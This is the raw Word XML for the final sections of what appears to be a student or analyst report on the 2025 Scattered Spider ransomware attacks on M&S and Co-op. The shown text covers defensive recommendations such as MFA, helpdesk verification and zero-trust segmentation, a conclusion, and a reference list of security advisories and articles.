    <w:p w14:paraId="3B905D59" w14:textId="35BCE6C0" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="00415F2D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig </w:t>
      </w:r>
      <w:r w:rsidR="006B16F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00096218" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Cost Implication UK 2025 Retail Cyber Campaign (GBP millions). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694D3327" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The recommendation about Multi-Factor Authentication (R1: FIDO2 Multi-Factor Authentication) and verification by helpdesk (R2: Helpdesk Verification) has an uneven benefit-cost ratio. The National Cyber Security Centre [7], Mandiant [8] and the Cybersecurity and Infrastructure Security Agency (CISA) list identity as the main attack point in cloud-architecture and hybrid-architecture. The systematic review of zero-trust architectures per IEEE presented by Srikrishna and Potlapally [13] shows that identity-based controls are the least expensive one in decreasing the likelihood of breaches in case of social engineering-related intrusions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2952A8C7" w14:textId="33CA0C78" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">R4 (Zero Trust/Network Segmentation): the most expensive recommendation but one that has a crucial strategic implication. The Master-Card Services breach demonstrates how one non-SECURE third-party supplier can provide a conduit to interior domain infrastructure [1][6] which an attacker can </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>utilise</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> such risk is mitigated by ZTA micro-segmentation point-blank. The network segmentation at Lemos is also rated as a best preventive measure of an adversary movement based on lateral movement, according to IEEE analysis of ransomware threat trends by Lemos [11].</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6321A106" w14:textId="77777777" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="002B14B2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8.  Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5AE603" w14:textId="77777777" w:rsidR="00667584" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A pivotal moment in UK cybersecurity history was the Scattered Spider/DragonForce attack on M&amp;S and Co-op in 2025. It shows how crime groups motivated by money, skilled at making ransomware-as-a-service, and trained in advanced social engineering can cause major national disruptions without using any new types of attacks. The eight-week dwell period, a £300 million loss to M&amp;S operational profit, and an £80 million impact on Co-op operating performance all demonstrate the deadly asymmetry between organizational consequence and attacker cost. Identity is the new border, according to the campaign's long-term lesson. Supply-chain partners take on an organization's risk posture; IT helpdesk social engineering creates a very dangerous but inadequately protected initial access point; and recovery capability is strategically just as important as prevention. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD6A139" w14:textId="3D1233D2" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Strong evidence of the efficacy of cross-sector threat-intelligence sharing as a force multiplier of UK retailing cyber resilience is provided by these conflicting results at M&amp;S and Co-op, where Co-op received faster, broader sector threat-intelligence dissemination and was informed by the announcement of M&amp;S's retailing cyber resilience. The next-generation research questions should investigate the intersection of AI-enhanced work in the field of deepfake voice synthesis and vishing exploits, a menace already being highlighted in NCSC warning bells, which can certainly diminish the process of checks by phone call. Those organizations that treat cyber resilience as a strategic development priority at boards, not as a subset of IT operations, will be in the best position to endure the rising number and sophistication of ransomware-as-a-service campaigns in the United Kingdom retail industry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73196F45" w14:textId="77777777" w:rsidR="00667584" w:rsidRPr="00C668B5" w:rsidRDefault="00667584" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C778503" w14:textId="334CF71E" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="002B14B2" w:rsidP="002B14B2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r w:rsidR="006D5E64" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DE4E3A" w14:textId="2BE6266C" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[1] A. Norman, Oral Evidence to the UK Parliament Business and Trade Sub-Committee on Economic</w:t>
      </w:r>
      <w:r w:rsidR="00534FB1" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Security, House of Commons, London, 8 Jul. 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436BD79E" w14:textId="1910A74F" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[2] BlackFog, 'Marks &amp; Spencer Breach: How a Ransomware Attack Crippled a UK Retail Giant,' BlackFog Blog, 31 Oct. 2025. [Online]. Available: https://www.blackfog.com/marks-and-spencer-ransomware-attack/ [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3BAC5B" w14:textId="2EEF51F3" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[3] UK Cyber Monitoring Centre (CMC), CMC Cyber Hurricane Scale Classification: Spring 2025 Retail Incidents, London: CMC, Jun. 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4FDE5F" w14:textId="2E279F5C" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[4] MITRE Corporation, 'Scattered Spider (G1015),' MITRE ATT&amp;CK® Enterprise Matrix, MITRE, 2025. [Online]. Available: https://attack.mitre.org/groups/G1015/ [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2212CF03" w14:textId="41195C39" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[5] ReliaQuest, 'Scattered Spider Cyber Attacks Using Phishing and Social Engineering 2025,' ReliaQuest Threat Research Blog, 23 Jun. 2025. [Online]. Available: https://reliaquest.com/blog/scattered-spider-cyber-attacks-using-phishing-social-engineering-2025/ [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469C5A2A" w14:textId="04F3BB58" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[6] Sangfor Technologies, 'Marks &amp; Spencer Cyberattack: A Wake-Up Call for Supply Chain Cybersecurity,' Sangfor Blog, 26 May 2025. [Online]. Available: https://www.sangfor.com/blog/cybersecurity/marks-spencer-cyberattack-2025-supply-chain-breach [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773BE04F" w14:textId="1566E122" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[7] National Cyber Security Centre (NCSC), 'Incidents Impacting Retailers – Recommendations from the NCSC,' NCSC Blog, London: HMSO, May 2025. [Online]. Available: https://www.ncsc.gov.uk/blog-post/incidents-impacting-retailers [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F193BD9" w14:textId="26D797BD" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[8] Mandiant Incident Response (Google Cloud), 'Defending Against UNC3944: Cybercrime Hardening Guidance from the Frontlines,' Google Cloud Blog, 6 May 2025. [Online]. Available: https://cloud.google.com/blog [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619C522" w14:textId="37E504F4" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[9] Mandiant Incident Response (Google Cloud), 'From Help Desk to Hypervisor: Defending Your VMware vSphere Estate from UNC3944,' Google Cloud Blog, 23 Jul. 2025. [Online]. Available: https://cloud.google.com/blog [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC5FE5" w14:textId="67FBCF91" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[10] MITRE Corporation, MITRE ATT&amp;CK® Enterprise Matrix v16, MITRE, 2025. [Online]. Available: https://attack.mitre.org/ [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E7DD62" w14:textId="4256E017" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">[11] M. S. Lemos, 'The Ransomware Threat Landscape,' IEEE Security &amp; Privacy, vol. 22, no. 1, pp. 14-22, Jan./Feb. 2024, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>doi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>: 10.1109/MSEC.2023.3342110.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A24E8EC" w14:textId="19DFBA35" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[12] R. Anderson, Security Engineering: A Guide to Building Dependable Distributed Systems, 3rd ed. Chichester: Wiley, 2020, pp. 121-145.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45086400" w14:textId="36F753A7" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">[13] D. Srikrishna and N. R. Potlapally, 'Zero Trust Architectures: A Systematic Review,' IEEE Trans. Dependable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Secur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Comput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">., vol. 21, no. 2, pp. 456-470, Mar./Apr. 2024, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>doi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>: 10.1109/TDSC.2023.3261897.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF12BAA" w14:textId="495103AF" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[14] European Union Agency for Cybersecurity (ENISA), ENISA Threat Landscape 2024, Heraklion: ENISA, Oct. 2024. [Online]. Available: https://www.enisa.europa.eu/publications/enisa-threat-landscape-2024 [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58250687" w14:textId="44073E7E" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">[15] B. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Toulas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, 'Co-op Says It Lost $107 Million After Scattered Spider Attack,' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>BleepingComputer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, 25 Sep. 2025. [Online]. Available: https://www.bleepingcomputer.com/news/security/co-op-says-it-lost-107-million-after-scattered-spider-attack/ [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7846EE" w14:textId="64F55385" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[16] Cyber Management Alliance (CM-Alliance), 'The Marks and Spencer Cyber Attack – Everything You Need to Know,' CM-Alliance Blog, 2025. [Online]. Available: https://www.cm-alliance.com/cybersecurity-blog/the-marks-and-spencer-cyber-attack-everything-you-need-to-know [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6445E2CA" w14:textId="3291F6CD" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[17] S. Machin, 'M&amp;S CEO Statement on Cyber Incident,' Marks &amp; Spencer PLC RNS Filing, London: London Stock Exchange, 22 Apr. 2025. [Online]. Available: https://www.londonstockexchange.com [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681A406A" w14:textId="24B5D604" w:rsidR="006D5E64" w:rsidRPr="00C668B5" w:rsidRDefault="006D5E64" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[18] Computer Weekly, 'M&amp;S, Co-op Attacks a "Category 2 Cyber Hurricane", Say UK Experts,' Computer Weekly, 20 Jun. 2025. [Online]. Available: https://www.computerweekly.com/news/366626336 [Accessed: Mar. 2026].</w:t>
      </w:r>
    </w:p>
